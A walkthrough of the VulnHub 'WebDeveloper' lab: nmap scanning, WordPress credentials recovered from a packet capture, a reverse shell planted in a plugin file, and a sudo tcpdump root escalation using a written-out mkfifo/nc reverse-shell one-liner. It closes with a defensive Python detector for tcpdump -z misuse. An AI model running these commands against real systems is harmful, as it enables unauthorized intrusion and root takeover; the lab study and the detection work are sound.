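Preface
⏰ Date: 2023.7.29
🗺️ Target VM: https://download.vulnhub.com/webdeveloper/WebDeveloper.ova
⚠️ Everything described in this article was done in a simulated lab VM. Never use it against a real environment without authorization.
🙏 My skill level is limited, so please point out any mistakes. Thank you for reading!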
Information gathering
Host discovery
Port and service detection
┌──(root㉿kali)-[~]
└─# nmap -A -T4 -v -p- 192.168.58.163
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d2:ac:73:4c:17:ec:6a:82:79:87:5a:f9:22:d4:12:cb (RSA)
| 256 9c:d5:f3:2c:e2:d0:06:cc:8c:15:5a:5a:81:5b:03:3d (ECDSA)
|_ 256 ab:67:56:69:27:ea:3e:3b:33:73:32:f8:ff:2e:1f:20 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Database Error
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 00:0C:29:6E:B6:EE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 47.917 days (since Sun Jun 11 18:11:51 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
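Directory scan
Visit it
Traffic analysis
Analyze the packet capture in Wireshark
The account name and password are found in the login request to wp-login.php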
Form item: “pwd” = “Te5eQg&4sBS!Yr$)wf%(DcAd”
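Reverse shell
After logging in, find the template editor and insert a reverse shell
The directory scan turned up wp-content/plugin/
The file just edited is akismet/akismet.php under plugin
Try visiting http://192.168.58.163/wp-content/plugins/akismet/akismet.php
Stable shell
Spawn a stable shell
Getting into Webdeveloper
…/ Go to the web root and look at wp-config.php
Switch to the webdeveloper user
Privilege escalation
tcpdump can be used for privilege escalation
After testing, the bash reverse shell did not succeed, and the target's nc does not support the -e option
But mkfifo works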
nc -nvlp 6666
echo 'rm -f /tmp/f;mkfifo /tmp/f;bash < /tmp/f|nc 192.168.58.153 6666 >/tmp/f' > haha
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/haha -Z root
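A defender-side check for the tcpdump step above, as an added example that is not part of the original write-up: it scans logged command lines (for instance from auditd or sudo logs) for tcpdump started with -z, the postrotate-command option that runs the helper file here, and notes when -Z root and a world-writable path make it worse. The function names, WRITABLE_DIRS and the sample log lines are assumptions made for this example.

```python
import shlex

# tcpdump short options that take a value (per the tcpdump(8) synopsis).
TAKES_VALUE = set("BcCEFGijmMQrsTVwWyzZ")
# Assumption: directories any local user can write to on the monitored hosts.
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

def parse_opts(argv):
    """getopt-style scan of short options: {letter: value, or True for a flag}."""
    opts, i = {}, 0
    while i < len(argv) and argv[i] != "--":
        arg, i = argv[i], i + 1
        if arg.startswith("-") and not arg.startswith("--"):
            for pos, letter in enumerate(arg[1:], start=1):
                opts[letter] = True  # plain flag, e.g. the l and n in -ln
                if letter in TAKES_VALUE:
                    value = arg[pos + 1:]  # attached form: -z/tmp/x
                    if not value and i < len(argv):
                        value, i = argv[i], i + 1  # separate form: -z /tmp/x
                    opts[letter] = value
                    break
    return opts

def review_command(cmdline):
    """Return findings for one logged command line; [] means nothing flagged."""
    argv = shlex.split(cmdline)
    names = [a.rsplit("/", 1)[-1] for a in argv]  # basename of every word
    if "tcpdump" not in names:
        return []
    start = names.index("tcpdump")
    opts = parse_opts(argv[start + 1:])
    hook, findings = opts.get("z"), []
    if hook:
        findings.append(f"-z runs a postrotate command: {hook}")
        if hook.startswith(WRITABLE_DIRS):
            findings.append("postrotate command is in a world-writable directory")
        if opts.get("Z") == "root":
            findings.append("-Z root: privileges are not dropped before it runs")
        if "sudo" in names[:start]:
            findings.append("tcpdump was started through sudo")
    return findings

if __name__ == "__main__":
    # Constructed audit-log command lines; the first is the one from this page.
    for line in (
        "sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/haha -Z root",
        "tcpdump -n -i eth0 -w /var/log/cap.pcap -G 3600 -z gzip",
    ):
        print(line, "->", review_command(line) or "nothing flagged")
```

A sudoers rule that lets an unprivileged account run tcpdump with arbitrary arguments is the root cause; restricting the rule to a fixed argument list removes the -z path entirely.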